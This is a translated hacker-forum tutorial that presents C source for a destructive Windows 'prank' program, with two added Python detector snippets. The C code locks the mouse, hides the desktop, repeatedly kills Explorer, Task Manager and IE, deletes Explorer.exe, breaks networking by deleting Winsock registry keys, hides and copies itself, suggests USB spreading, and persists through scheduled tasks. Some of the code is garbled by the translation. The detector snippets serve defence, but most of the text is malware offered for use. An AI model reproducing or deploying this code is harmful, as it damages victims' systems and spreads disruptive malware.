Source: myhack58, author 佚名 (anonymous), ID MYHACK58:6220065984
Published: Jan 01, 2006 - 12:00 a.m.

Hooked on pranks - Vulnerability warning - The Black Bar Safety Net

www.myhack58.com

PS. While searching my hard disk today I came across this article… I wrote it a long time ago and forgot to post it here… it was fast becoming a fossil on my hard disk… The program involves no real technique; have a look for fun, and take whatever is useful…

I had wanted to write a destructive program for a long time but never got around to it. While testing Trojans with friends I came across something, so I decided to write it up; combining several pieces produced my first prank program. Today I will introduce how the mischief is implemented, and to make it easier to read I will describe it block by block.

Control the mouse

Code:
void Mouse()
{
RECT Rect;
Rect. left=1 0;
Rect. top=1 0;
Rect. right=2 0;
Rect. bottom=2 0; //set lock region size
ClipCursor(&Rect); // lock the mouse, to limit the moving area
SwapMouseButton(TRUE); //swap left and right mouse buttons
}

A few simple API calls complete the task. The user can no longer use the mouse properly, because the cursor is locked in a very small area at the top left.

Hide desktop icons

Code:
void HDesk()
{
HWND hDesktop;
hDesktop = FindWindow(“ProgMan”, NULL); //get desktop handle
ShowWindow(hDesktop, SW_HIDE); //hide desktop icons
}

Very simple, right? Two calls hide all the shortcuts on the desktop. But this won't scare advanced users, so I thought of a nastier way: kill the Explorer process, haha~~ so that nothing is left on the screen. But the system will soon restart the Explorer process, so what to do? Two approaches come to mind here.
First way: use the Sleep() function to check at intervals whether the Explorer process exists, and kill it if it does.

Code:
void kprocess(const char *processname)
{
char *fengze;
DWORD processid[1 0 2 4],needed,processcount,io;
HANDLE hProcess;
HMODULE hModule;
char path[MAX_PATH] = “”,temp[2 5 6]; //define variables

EnablePrivilege(SE_DEBUG_NAME,TRUE); //elevate privileges
EnumProcesses(processid, sizeof(processid), &needed); //enumerate all the processes
processcount=needed/sizeof(DWORD); //calculate the number of processes
for (io=0;io<processcount;io++) //iterate through all processes
{
hProcess=OpenProcess(PROCESS_QUERY_INFORMATION |PROCESS_TERMINATE |PROCESS_VM_READ|PROCESS_VM_WRITE,false,processid[io]);
//Open process and get process handle
if (hProcess)
{
EnumProcessModules(hProcess, &hModule, sizeof(hModule), &needed);
// Enumerate the open process module
GetModuleFileNameEx(hProcess, hModule, path, sizeof(path));
// Get Module File name contains the path
GetShortPathName(path,path,2 5 6);
//The long file name into a short file name
itoa(processid[io],temp,1 0); //convert to string
if((fengze=strstr(path,processname)))
//In process path to find whether it contains the relevant characters
{
TerminateProcess(hProcess,0); //if there is End Process
}
else
CloseHandle(hProcess); //close open process
}
}
EnablePrivilege(SE_DEBUG_NAME,FALSE); //restore permissions
}

Function to enable and restore the privilege:
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(! OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return 0; //Open the process Token Ring
if(! LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
return 1; //modify process privileges
tp. PrivilegeCount = 1; //assigned to the present process privileges
tp. Privileges[0]. Luid = luid;
tp. Privileges[0]. Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
//Notify Windows To modify the present process permissions
CloseHandle(hToken); return 0;
}
Use a goto statement to implement the loop:
void monitor()
{
char *tha=“Explorer”; char *thb=“explorer”;
//Here the definition of 2 is because the system in the recovery after the process name at the beginning it becomes lowercase.
bg: kprocess(tha);
kprocess(thb); //kill process
Sleep(3 0 0 0); //the program sleep 3 seconds, so that the program of the CPU use is also reduced.
Goto bg ;
}

The above achieves the goal with a loop. Another method is to kill the process, then find Explorer.exe and delete it, so that the system pops up a dialog box asking for the installation disc to be inserted for recovery; if the computer is turned off at this point, oh~~ then nothing is displayed the next time the system starts. We should also kill Task Manager, IE, CMD and some other processes, to ensure that our own process is not killed by the user.
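Added example (not from the original article): how the 3-second kill loop above looks in process start/exit telemetry, and a detector for it. The event tuples are constructed sample data, and the thresholds `max_life`, `min_hits` and `window` are assumptions to tune; image names are compared case-insensitively because, as the article notes, the restarted shell's name changes case.

```python
from collections import deque

# Constructed sample events, not real telemetry: (seconds, action, image path, pid).
LOOP_EVENTS = [
    (0.0, "start", r"C:\WINDOWS\Explorer.EXE", 1200),
    (900.0, "exit", r"C:\WINDOWS\Explorer.EXE", 1200),   # first kill
    (901.0, "start", r"C:\WINDOWS\explorer.exe", 1310),  # shell restarted
    (903.1, "exit", r"C:\WINDOWS\explorer.exe", 1310),
    (904.0, "start", r"C:\WINDOWS\explorer.exe", 1422),
    (906.1, "exit", r"C:\WINDOWS\explorer.exe", 1422),
    (907.0, "start", r"C:\WINDOWS\explorer.exe", 1530),
    (909.1, "exit", r"C:\WINDOWS\explorer.exe", 1530),
]
CRASH_EVENTS = [  # constructed: one ordinary shell crash and restart
    (0.0, "start", r"C:\WINDOWS\Explorer.EXE", 1200),
    (500.0, "exit", r"C:\WINDOWS\Explorer.EXE", 1200),
    (501.0, "start", r"C:\WINDOWS\explorer.exe", 1310),
]

def short_lived_shells(events, image="explorer.exe", max_life=5.0):
    """Return exit times of shell instances that lived at most max_life seconds."""
    started, exits = {}, []
    for ts, action, path, pid in sorted(events):
        # Compare only the file name, lower-cased, so Explorer.EXE == explorer.exe.
        if path.lower().rsplit("\\", 1)[-1] != image:
            continue
        if action == "start":
            started[pid] = ts
        elif action == "exit" and pid in started:
            if ts - started.pop(pid) <= max_life:
                exits.append(ts)
    return exits

def detect_kill_loop(events, min_hits=3, window=30.0):
    """True when min_hits short-lived shell instances exit within window seconds."""
    recent = deque()
    for ts in short_lived_shells(events):
        recent.append(ts)
        while ts - recent[0] > window:   # drop exits that fell out of the window
            recent.popleft()
        if len(recent) >= min_hits:
            return True
    return False
```
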

Note:#include “PSAPI. H” //program needs the header file
#pragma comment( lib, “PSAPI. LIB” ) //the program needs the library files

The following is the file search function:

Code:
int viewfiles(char *directory)
{
WIN32_FIND_DATA fdFindData;
HANDLE hFind;
char *filename;
int count=0;
BOOL done;

filename=new char[strlen(directory)+5]; //give the filename assigned directory+5 Space
strcpy(filename,directory); //the directory of characters copied to the filename
strcat(filename,“\\.”); //The filename with the\\. Connection
hFind=FindFirstFile(filename,&fdFindData);
//Based on filename to find a file, returns the search handle to hFind
delete[] filename; //release the memory
done=hFind!= INVALID_HANDLE_VALUE;
while(done)
{
if(strcmp(fdFindData. cFileName,“.”) && strcmp(fdFindData. cFileName,“…”))
//Determine the current directory or the parent directory
{
filename=new char[strlen(directory)+strlen(fdFindData. cFileName)+2];
// To the filename assigned space
strcpy(filename,directory); //the directory to copy to the filename
strcat(filename,"\"); //the filename with“\\”
strcat(filename,fdFindData. cFileName); //filename plus the file name
if((fdFindData. dwFileAttributes&FILE_ATTRIBUTE_DIRECTORY)==FILE_ATTRIBUTE_DIRECTORY)
//If found is a directory, then enter the directory recursively
count+=viewfiles(filename);
else
if(strstr(fdFindData. cFileName,“Explorer.exe”)) //determine whether to find the file
{
count++; //to find the file count
DeleteFile(filename); //remove the textMember
}
delete[] filename; //release the memory
}
done=FindNextFile(hFind,&fdFindData); //find the next file
}
FindClose(hFind);
return(count);
}

When calling this function you only need to specify one partition; of course you can also use a loop to traverse all partitions, quack~~ that would be vicious.

Control the CD-ROM drive

Code:
void Dfind()
{
int i;
UINT type;
char name;
char Dname[1 2 8];
for (name=‘A’;name<=‘Z’;name++) //traverse all drives
{
Dname[0]=name; Dname[1]=‘:’; Dname[2]=‘\'; Dname[3]=’\0’;
type = GetDriveType(Dname); //determine the drive type
if (type==DRIVE_CDROM)
{ //If it is the drive will open
mciSendString(“Set cdAudio door open wait”, NULL, 0, NULL);
mciSendString(“Set cdAudio door closed wait”, NULL, 0, NULL);
}
}
}

Then add a loop to open and close the drive non-stop, and the friend who gets hit will certainly be surprised.

Modifying the registry

There are many, many examples of registry operations that you can look up; here I will introduce just one.

Code:
void regdel()
{
HKEY hkresult;
LPCTSTR data=“SYSTEM\\CurrentControlSet\\Services\\WinSock2\\SPI5. 0\\Catalog_Entries”;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,
data, 0, KEY_ALL_ACCESS, &hkresult );
RegDeleteKey(hkresult,“0 0 0 0 0 0 0 0 0 0 0 1”); RegDeleteKey( hkresult,“0 0 0 0 0 0 0 0 0 0 0 2”);
RegDeleteKey( hkresult,“0 0 0 0 0 0 0 0 0 0 0 3”);

RegDeleteKey( hkresult,“0 0 0 0 0 0 0 0 0 0 1 5”);
}

After the registry deletion above, the computer shows nothing abnormal and can still connect to the network, but QQ cannot log in and IE cannot access websites…
With the operations above, I believe the friend who got hit has fainted~~. But damage alone is not enough; we also want to ensure that the program survives. So I thought of having the program copy and hide itself.

Code:
void filehidden()
{
UINT type;
char name;
char Dname[4];
char LPath[MAX_PATH];
char SysPath [MAX_PATH];

GetModuleFileName(NULL,LPath,MAX_PATH);
//Get the current file path
SetFileAttributes(LPath,FILE_ATTRIBUTE_HIDDEN
+FILE_ATTRIBUTE_SYSTEM);
//The file set to hidden and system attributes
GetSystemDirectory(SysPath,MAX_PATH);
strcat(SysPath,“\\黑色 天空 .exe”);
CopyFile(LPath,SysPath,FALSE); //copy to the specified path
}

We can also adapt the drive-control code above so that the program is copied to a USB disk or other writable external media attached to the computer, to achieve the purpose of spreading. It is very simple to implement, so it is left for you to complete.
Now the file is hidden, but how do we start the program? The registry? No, we will use the system's scheduled tasks. Use the AT.exe program that comes with the system? No! We write our own :)

Code:
void Jobadd(char * SysPath) //file path we are free from the above program to get
{
DWORD JobId;
AT_INFO ai;
long Len;
WCHAR szFilePath[2 5 6];
memset(&ai,0,sizeof(ai));
Len=MultiByteToWideChar(CP_ACP,0,SysPath,strlen(SysPath),
szFilePath,sizeof(szFilePath));
szFilePath[Len] = ‘\0’;
//The path is converted into Unicode code
ai. Command=szFilePath;
ai. DaysOfMonth=0;
ai. DaysOfWeek=0x60;
ai. Flags=JOB_RUN_PERIODICALLY;
ai. JobTime=1 16 06 01 0 0 0+5 06 0*1 0 0 0;
//Give ai a structure variable, each member of the assignment
NetScheduleJobAdd(NULL,LPBYTE(&ai),&JobId);
//Call the API function to add scheduled task
}

The function above adds a scheduled task that runs our specified program every Saturday and Sunday at 11:50 a.m. But this relies on the Task Scheduler service, so we directly call the system() function to run the Net Start Schedule command.

Note:#include <lmcons. h>
#include <lmat. h> //program needs the header file
#pragma comment(lib,“NETAPI32. LIB”) //the program needs the library files
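Added example (not from the original article): a triage helper that decodes AT job records with the same field names as `AT_INFO` and flags the persistence pattern described above, a periodic job whose binary sits in the system directory with hidden and system attributes. The job records, the attribute map, the file name `example.exe` and the `system_dir` default are constructed assumptions; the flag values are the ones defined in lmat.h and winnt.h.

```python
DAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]  # DaysOfWeek bit 0 = Monday
JOB_RUN_PERIODICALLY = 0x01    # lmat.h
FILE_ATTRIBUTE_HIDDEN = 0x02   # winnt.h
FILE_ATTRIBUTE_SYSTEM = 0x04   # winnt.h

# Constructed records; example.exe is a placeholder, not the article's file name.
SUSPECT_JOB = {"JobTime": 42600000, "DaysOfMonth": 0, "DaysOfWeek": 0x60,
               "Flags": 0x01, "Command": r"C:\WINDOWS\system32\example.exe"}
BACKUP_JOB = {"JobTime": 7200000, "DaysOfMonth": 0, "DaysOfWeek": 0x01,
              "Flags": 0x01, "Command": r"D:\tools\backup.cmd"}
# Constructed file-attribute lookup, keyed by lower-cased path.
ATTRS = {r"c:\windows\system32\example.exe": 0x06, r"d:\tools\backup.cmd": 0x20}

def decode_schedule(job):
    """Render the AT_INFO timing fields as readable text."""
    minutes = job["JobTime"] // 60000            # JobTime is ms after midnight
    clock = f"{minutes // 60:02d}:{minutes % 60:02d}"
    days = [d for i, d in enumerate(DAYS) if (job["DaysOfWeek"] >> i) & 1]
    days += [str(i + 1) for i in range(31) if (job["DaysOfMonth"] >> i) & 1]
    if not days:
        return f"once at {clock}"
    kind = "every" if job["Flags"] & JOB_RUN_PERIODICALLY else "next"
    return f"{kind} {','.join(days)} at {clock}"

def triage(job, attrs, system_dir=r"c:\windows\system32"):
    """Return the reasons a job resembles the persistence described above."""
    reasons = []
    cmd = job["Command"].strip('"').lower()
    if job["Flags"] & JOB_RUN_PERIODICALLY:
        reasons.append("periodic")
    if cmd.startswith(system_dir + "\\"):
        reasons.append("binary in system directory")
    hidden_sys = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
    if (attrs.get(cmd, 0) & hidden_sys) == hidden_sys:
        reasons.append("hidden+system attributes")
    return reasons
```

A job that collects all three reasons deserves a closer look; a periodic job on its own, like the constructed backup entry, is routine.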

Well, the basic introduction is over. If you feel it is still not perfect, you can add something yourself, but don't go overboard, oh, or the police uncle will buy you a cup of coffee.